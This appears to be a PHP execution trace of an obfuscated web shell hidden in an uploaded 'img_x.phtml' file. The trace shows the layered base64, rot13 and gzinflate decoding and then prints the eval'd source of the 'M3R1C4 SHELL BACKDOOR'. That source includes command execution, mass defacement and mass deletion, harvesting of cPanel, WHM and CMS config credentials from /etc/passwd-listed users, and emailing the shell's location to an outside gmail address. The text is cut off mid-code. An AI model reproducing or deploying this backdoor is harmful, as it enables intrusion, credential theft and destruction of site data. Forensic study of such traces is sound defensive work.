Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:35:39.874839]
1	0	1	0.000145	393528
1	3	0	0.000257	423008	{main}	1		/var/www/html/uploads/img_x.phtml	0	0
1		A						/var/www/html/uploads/img_x.phtml	69	$aDriv4 = '7X35W+LI1vDPPc8z/1A119voqxJA3Je5oCyisioC3f34JDEJIoYkkFWYmfdi/0EtTAkItjP33vd4dCFWSJ06SGjqrLVjXGonn6pyQ+Gu0emgd6XWrudlbGeZVyTRr79jXN2QrTGPqgOUFZ5HG3qjb62CFFCd4tRbyTBeFGeETbwuXIm2YCnoCyrJiqp46tjIHOBZesMQRFq1p5BHkwRObPn86y/4H9lDHhR4dzzY1tRF1pMbx7/+b1WSID1VhihVisWP6cdff7FT63DIPUjHlvbw2BMUUH4Yi9r6xsbvv/4yEiRQ1cz1tYfzXKGIRxmtWozB6dkaINwzYw6a8hV//o5BkaxVlijbqnka8jrLBdX8Vv41NEZA8ZPPuqApA9FApjK1z3795cT9NUcd/yqWbxt0eHiodwwHdXrthKNfIIkjbOIE89/wh99RRgQsJtDY05j6KPb4Vjr1r/FHteyEJllwkGZ6qMq2NTmNnRuyyqs8KpiGeiNdSEd+jHe9CfpZ'
2	4	0	0.000319	423120	base64_decode	0		/var/www/html/uploads/img_x.phtml	70	1	'7X35W+LI1vDPPc8z/1A119voqxJA3Je5oCyisioC3f34JDEJIoYkkFWYmfdi/0EtTAkItjP33vd4dCFWSJ06SGjqrLVjXGonn6pyQ+Gu0emgd6XWrudlbGeZVyTRr79jXN2QrTGPqgOUFZ5HG3qjb62CFFCd4tRbyTBeFGeETbwuXIm2YCnoCyrJiqp46tjIHOBZesMQRFq1p5BHkwRObPn86y/4H9lDHhR4dzzY1tRF1pMbx7/+b1WSID1VhihVisWP6cdff7FT63DIPUjHlvbw2BMUUH4Yi9r6xsbvv/4yEiRQ1cz1tYfzXKGIRxmtWozB6dkaINwzYw6a8hV//o5BkaxVlijbqnka8jrLBdX8Vv41NEZA8ZPPuqApA9FApjK1z3795cT9NUcd/yqWbxt0eHiodwwHdXrthKNfIIkjbOIE89/wh99RRgQsJtDY05j6KPb4Vjr1r/FHteyEJllwkGZ6qMq2NTmNnRuyyqs8KpiGeiNdSEd+jHe9CfpZ'
2	4	1	0.000403	443632
2	4	R			'}[=3P5\022@ܗ,*\002$1\t"$UbA-L\t\b3xt!VH:Hhꬵc\\j\'rCw֮elgW$ѯc\\ݐ1\003\025G\033zo\024P[0^\024gM.\\`)\v*Ɋx\034Yz\020DZG\004Nl/\037C\036\024xw<E֓\033ǿoU =U(Uŏ_Sp=Hǖ\023\024P~\0302\022$P\\G\031Z\032 3c\016\025AU(۪y\032:\005V54F@Ϻ)\003@2~5G\035*o\033txxw\f\auz턣_ #l\004QF\004,&Ә(V:G&Ypfzʶ59\033ʫ<*z#]HG~w\tYG!<Cѵ``\bo'
2	5	0	0.000726	443600	str_rot13	0		/var/www/html/uploads/img_x.phtml	70	1	'}[=3P5\022@ܗ,*\002$1\t"$UbA-L\t\b3xt!VH:Hhꬵc\\j\'rCw֮elgW$ѯc\\ݐ1\003\025G\033zo\024P[0^\024gM.\\`)\v*Ɋx\034Yz\020DZG\004Nl/\037C\036\024xw<E֓\033ǿoU =U(Uŏ_Sp=Hǖ\023\024P~\0302\022$P\\G\031Z\032 3c\016\025AU(۪y\032:\005V54F@Ϻ)\003@2~5G\035*o\033txxw\f\auz턣_ #l\004QF\004,&Ә(V:G&Ypfzʶ59\033ʫ<*z#]HG~w\tYG!<Cѵ``\bo'
2	5	1	0.001056	460016
2	5	R			'}[=3C5\022@ܗ,*\002$1\t"$HoN-Y\t\b3kg!IU:Uuꬵp\\w\'ePj֮rytJ$ѯp\\ݐ1\003\025T\033mb\024C[0^\024tZ.\\`)\v*Ɋk\034Lm\020QMT\004Ay/\037P\036\024kj<R֓\033ǿbH =H(Hŏ_Fc=Uǖ\023\024C~\0302\022$C\\T\031M\032 3p\016\025NH(۪l\032:\005I54S@Ϻ)\003@2~5T\035*b\033gkkj\f\ahm턣_ #y\004DS\004,&Ә(I:T&Lcsmʶ59\033ʫ<*m#]UT~j\tLT!<Pѵ``\bb'
2	6	0	0.001363	439504	gzinflate	0		/var/www/html/uploads/img_x.phtml	70	1	'}[=3C5\022@ܗ,*\002$1\t"$HoN-Y\t\b3kg!IU:Uuꬵp\\w\'ePj֮rytJ$ѯp\\ݐ1\003\025T\033mb\024C[0^\024tZ.\\`)\v*Ɋk\034Lm\020QMT\004Ay/\037P\036\024kj<R֓\033ǿbH =H(Hŏ_Fc=Uǖ\023\024C~\0302\022$C\\T\031M\032 3p\016\025NH(۪l\032:\005I54S@Ϻ)\003@2~5T\035*b\033gkkj\f\ahm턣_ #y\004DS\004,&Ә(I:T&Lcsmʶ59\033ʫ<*m#]UT~j\tLT!<Pѵ``\bb'
2	6	1	0.001821	509168
2	6	R			'//Z3E1P4 FURYY ONPXQBBE I1.0 \r\n//Qrfvta Ol Abiny - GPN grnz\r\n//Terrmg : VaqbKcybvg & Hfgnqpntr48\r\n//Xrrc Pnyz & Pebbgm!\r\n\r\n\r\nfrg_gvzr_yvzvg(0);\r\nreebe_ercbegvat(0);\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'<!qbpglcr ugzy>\r\n<ugzy>\r\n<urnq>\r\n<gvgyr>$$ Orol $$</gvgyr>\r\n</urnq>\';\r\n\r\n?>\r\n<?cuc\r\n$xvzr="ndchax21@tznvy.pbz";\r\n$onfyvx="Crfnana Furyy qngnat Phx !";\r\n$fclunpxrem="Qbfln Lbyh : ".$'
2	7	0	0.001990	492752	str_rot13	0		/var/www/html/uploads/img_x.phtml	70	1	'//Z3E1P4 FURYY ONPXQBBE I1.0 \r\n//Qrfvta Ol Abiny - GPN grnz\r\n//Terrmg : VaqbKcybvg & Hfgnqpntr48\r\n//Xrrc Pnyz & Pebbgm!\r\n\r\n\r\nfrg_gvzr_yvzvg(0);\r\nreebe_ercbegvat(0);\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'<!qbpglcr ugzy>\r\n<ugzy>\r\n<urnq>\r\n<gvgyr>$$ Orol $$</gvgyr>\r\n</urnq>\';\r\n\r\n?>\r\n<?cuc\r\n$xvzr="ndchax21@tznvy.pbz";\r\n$onfyvx="Crfnana Furyy qngnat Phx !";\r\n$fclunpxrem="Qbfln Lbyh : ".$'
2	7	1	0.002185	562416
2	7	R			'//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!\r\n\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!doctype html>\r\n<html>\r\n<head>\r\n<title>$$ Beby $$</title>\r\n</head>\';\r\n\r\n?>\r\n<?php\r\n$kime="aqpunk21@gmail.com";\r\n$baslik="Pesanan Shell datang Cuk !";\r\n$spyhackerz="Dosya Yolu : ".$'
2	8	0	0.004137	890592	eval	1	'//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!\r\n\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!doctype html>\r\n<html>\r\n<head>\r\n<title>$$ Beby $$</title>\r\n</head>\';\r\n\r\n?>\r\n<?php\r\n$kime="aqpunk21@gmail.com";\r\n$baslik="Pesanan Shell datang Cuk !";\r\n$spyhackerz="Dosya Yolu : ".$_SERVER[\'DOCUMENT_ROOT\']."\\r\\n";\r\n$spyhackerz.="Server Admin : ".$_SERVER[\'SERVER_ADMIN\']."\\r\\n";\r\n$spyhackerz.="Server isletim sistemi : ".$_SERVER[\'SERVER_SOFTWARE\']."\\r\\n";\r\n$spyhackerz.="Shell Link : http://".$_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\']."\\r\\n";\r\n$spyhackerz.="Avlanan Site : " .$_SERVER[\'HTTP_HOST\']."\\r\\n";\r\nmail($kime, $baslik, $spyhackerz);\r\n?>\r\n<style> \r\n@font-face {\r\n  font-family: \'Comic Sans MS\';\r\n  font-style: normal;\r\n  font-weight: 400;\r\n  src: local(\'Comic Sans MS\'), local(\'ComicSansMS\'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format(\'truetype\');\r\n}\r\nbody {\r\n\t\r\n  background: black url("data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=");\r\nline-height: 1;color: #fff;font-family: Comic Sans MS ;\r\n  \r\n  }\r\n  \r\ntable, th, td {\r\n\tborder-collapse:collapse;\r\n\tbackground: transparent;\r\n\tfont-family: Comic Sans MS ;\r\n\tfont-size: 13px;\r\n}\r\ninput, textarea { font-family: Comic Sans MS ; }\r\n.table_home, .th_home, .td_home { color:grey;\r\n\tborder: 1px solid grey;\r\n}\r\nth {\r\n\tpadding: 10px;\r\n}\r\n.td_home { padding: 7px; }\r\nselect {font-family: Comic Sans MS }\r\na {color:white}\r\ntextarea { width: 100%;height: 400px; }\r\n</style>\r\n<?php\r\n\r\necho \'</head>\r\n<body><b>\r\n<H1><center>M3R1C4 <font color="red">SHELL BACKDOOR</font> <font color="dodgerblue">V1.0</font></center></h1>\r\n<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\r\n<tr><td>\r\n\r\n<font color="green"><center>\'.php_uname().\'</center></font><br>\';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = \r\ngetcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<font color=#fff><center>Current DIR:<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\necho "<hr>";\r\necho "<right>";\r\necho "<ul>";\r\necho "<li><a href=\'?\'>Home</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cmd\'>Command</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=mass_deface\'>Mass Deface</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=mass_delete\'>Mass Delete</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=config\'>Config</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=jumping\'>Jumping</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cpanel\'>CPanel Crack</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=smtp\'>SMTP Grabber</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=zoneh\'>Zone-H</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cgi\'>CGI Telnet</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=network\'>network</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=adminer\'>Adminer</a></li><br>";\r\necho "<li><a href=\'?dir=$dir&do=fake_root\'>Fake Root</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_edit_user\'>Auto Edit User</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_wp\'>Auto Edit Title WordPress</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_dwp\'>WordPress Auto Deface</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_dwp2\'>WordPress Auto Deface V.2</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cpftp_auto\'>CPanel/FTP Auto Deface</a></li>";\r\necho "</ul>";\r\necho "</right>";\r\necho "<hr>";\r\nif($_GET[\'do\'] == \'upload\') {\r\n\techo "<center>";\r\n\tif($_POST[\'upload\']) {\r\n\t\tif(@copy($_FILES[\'ix_file\'][\'tmp_name\'], "$dir/".$_FILES[\'ix_file\'][\'name\']."")) {\r\n\t\t\t$act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES[\'ix_file\'][\'name\']."</b></i>";\r\n\t\t} else {\r\n\t\t\t$act = "<font color=red>failed to upload file</font>";\r\n\t\t}\r\n\t}\r\n\techo "Upload File: [ ".w($dir,"Writeable")." ]<form method=\'post\' enctype=\'multipart/form-data\'><input type=\'file\' name=\'ix_file\'><input type=\'submit\' value=\'upload\' name=\'upload\'></form>";\r\n\techo $act;\r\n\techo "</center>";\r\n} elseif($_GET[\'do\'] == \'cmd\') {\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>".$user."@".gethostbyname($_SERVER[\'HTTP_HOST\']).":~# </font>\r\n\t<input type=\'text\' size=\'30\' height=\'10\' name=\'cmd\'><input type=\'submit\' name=\'do_cmd\' value=\'>>\'>\r\n\t</form>";\r\n\tif($_POST[\'do_cmd\']) {\r\n\t\techo "<pre>".exe($_POST[\'cmd\'])."</pre>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_deface\') {\r\n\tfunction sabun_massal($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[<font color=lime>DONE</font>] $lokasi<br>";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t\t$idx = sabun_massal($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[<font color=lime>DONE</font>] $lokasi<br>";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\tif($_POST[\'tipe_sabun\'] == \'mahal\') {\r\n\t\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\t\tsabun_massal($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "</div>";\r\n\t\t} elseif($_POST[\'tipe_sabun\'] == \'murah\') {\r\n\t\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\t\tsabun_biasa($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "</div>";\r\n\t\t}\r\n\t} else {\r\n\techo "<center>";\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>Tipe Sabun:</font><br>\r\n\t<input type=\'radio\' name=\'tipe_sabun\' value=\'murah\' checked>Biasa<input type=\'radio\' name=\'tipe_sabun\' value=\'mahal\'>Massal<br>\r\n\t<font style=\'text-decoration: underline;\'>Folder:</font><br>\r\n\t<input type=\'text\' name=\'d_dir\' value=\'$dir\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Filename:</font><br>\r\n\t<input type=\'text\' name=\'d_file\' value=\'index.php\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Index File:</font><br>\r\n\t<textarea name=\'script\' style=\'width: 450px; height: 200px;\'>Hacked by </textarea><br>\r\n\t<input type=\'submit\' name=\'start\' value=\'Mass Deface\' style=\'width: 100px;\'>\r\n\t</form></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_delete\') {\r\n\tfunction hapus_massal($dir,$namafile) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tif(file_exists("$dir/$namafile")) {\r\n\t\t\t\t\t\tunlink("$dir/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tif(file_exists("".dirname($dir)."/$namafile")) {\r\n\t\t\t\t\t\tunlink("".dirname($dir)."/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\tif(file_exists($lokasi)) {\r\n\t\t\t\t\t\t\t\techo "[<font color=lime>DELETED</font>] $lokasi<br>";\r\n\t\t\t\t\t\t\t\tunlink($lokasi);\r\n\t\t\t\t\t\t\t\t$idx = hapus_massal($dirc,$namafile);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\thapus_massal($_POST[\'d_dir\'], $_POST[\'d_file\']);\r\n\t\techo "</div>";\r\n\t} else {\r\n\techo "<center>";\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>Folder:</font><br>\r\n\t<input type=\'text\' name=\'d_dir\' value=\'$dir\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Filename:</font><br>\r\n\t<input type=\'text\' name=\'d_file\' value=\'index.php\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<input type=\'submit\' name=\'start\' value=\'Mass Delete\' style=\'width: 100px;\'>\r\n\t</form></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'config\') {\r\n\t$etc = fopen("/etc/passwd", "r");\r\n\t$idx = mkdir("idx_config", 0777);\r\n\t$isi_htc = "Options all\\nRequire None\\nSatisfy Any";\r\n\t$htc = fopen("idx_config/.htaccess","w");\r\n\tfwrite($htc, $isi_htc);\r\n\twhile($passwd = fgets($etc)) {\r\n\t\tif($passwd == "" || !$etc) {\r\n\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t} else {\r\n\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_config);\r\n\t\t\tforeach($user_config[1] as $user_idx) {\r\n\t\t\t\t$user_config_dir = "/home/$user_idx/public_html/";\r\n\t\t\t\tif(is_readable($user_config_dir)) {\r\n\t\t\t\t\t$grab_config = array(\r\n\t\t\t\t\t\t"/home/$user_idx/.my.cnf" => "cpanel",\r\n\t\t\t\t\t\t"/home/$user_idx/.accesshash" => "WHM-accesshash",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/vdo_config.php" => "Voodoo",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/forum/config.php" => "phpBB",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/app/etc/local.xml" => "Magento",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/admin/config.php" => "OpenCart",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/slconfig.php" => "Sitelok",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/application/config/database.php" => "Ellislab");\r\n\t\t\t\t\tforeach($grab_config as $config => $nama_config) {\r\n\t\t\t\t\t\t$ambil_config = file_get_contents($config);\r\n\t\t\t\t\t\tif($ambil_config == \'\') {\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");\r\n\t\t\t\t\t\t\tfputs($file_config,$ambil_config);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\t\t\r\n\t\t\t}\r\n\t\t}\t\r\n\t}\r\n\techo "<center><a href=\'?dir=$dir/idx_config\'><font color=lime>Done</font></a></center>";\r\n} elseif($_GET[\'do\'] == \'jumping\') {\r\n\t$i = 0;\r\n\techo "<pre><div class=\'margin: 5px auto;\'>";\r\n\t$etc = fopen("/etc/passwd", "r");\r\n\twhile($passwd = fgets($etc)) {\r\n\t\tif($passwd == \'\' || !$etc) {\r\n\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t} else {\r\n\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n\t\t\tforeach($user_jumping[1] as $user_idx_jump) {\r\n\t\t\t\t$user_jumping_dir = "/home/$user_idx_jump/public_html";\r\n\t\t\t\tif(is_readable($user_jumping_dir)) {\r\n\t\t\t\t\t$i++;\r\n\t\t\t\t\t$jrw = "[<font color=lime>R</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\tif(is_writable($user_jumping_dir)) {\r\n\t\t\t\t\t\t$jrw = "[<font color=lime>RW</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo $jrw;\r\n\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t$domain_jump = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\tif($domain_jump == \'\') {\r\n\t\t\t\t\t\t\techo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n\t\t\t\t\t\t\tforeach($domains_jump[1] as $dj) {\r\n\t\t\t\t\t\t\t\t$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t$user_jumping_url = $user_jumping_url[\'name\'];\r\n\t\t\t\t\t\t\t\tif($user_jumping_url == $user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\techo " => ( <u>$dj</u> )<br>";\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "<br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($i == 0) { \r\n\t} else {\r\n\t\techo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER[\'HTTP_HOST\'])."";\r\n\t}\r\n\techo "</div></pre>";\r\n} elseif($_GET[\'do\'] == \'auto_edit_user\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\tif(strlen($_POST[\'pass_baru\']) < 6 OR strlen($_POST[\'user_baru\']) < 6) {\r\n\t\t\techo "username atau password harus lebih dari 6 karakter";\r\n\t\t} else {\r\n\t\t\t$user_baru = $_POST[\'user_baru\'];\r\n\t\t\t$pass_baru = md5($_POST[\'pass_baru\']);\r\n\t\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t\t$scan_conf = scandir($conf);\r\n\t\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t\t$config = 